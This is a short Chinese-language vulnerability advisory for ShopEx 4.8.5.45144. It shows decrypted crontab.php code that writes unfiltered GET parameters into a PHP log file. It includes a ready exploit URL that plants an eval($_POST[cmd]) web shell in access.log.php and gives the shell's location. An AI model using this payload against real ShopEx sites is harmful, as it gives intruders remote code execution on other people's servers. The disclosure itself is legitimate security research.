影响版本:
shopex 4.8.5.45144
漏洞描述:
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。
\core\include_v5\crontab.php (zend加密后的,我只发布解密后的代码)
01 public function run( )
02 {
03 $this->logFile = HOME_DIR."/logs/access.log.php";
04 $this->now = time( );
05 $this->viewStat( );
06 $messenger =& $this->loadModel( "system/messenger" );
07 $messenger->runQueue( );
08 }
09
10 public function viewStat( )
11 {
12 if ( !file_exists( $this->logFile ) )
13 {
14 file_put_contents( $this->logFile, "#<?php exit()?>\n" ); //囧之处!By:小翔
15 }
16 if ( isset( $_GET['action'] ) )
17 {
18 error_log( $this->now."\t".$_GET['action']."\t".$_GET['p']."\n", 3, $this->logFile );//没有任何过滤,By:小翔
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
直接提交:http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?> 一句话在:http://127.0.0.1/shopex/home/logs/access.log.php
安全建议:
厂商补丁: ShopEx.cn ------------------ 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: www.ShopEx.cn
0 条评论。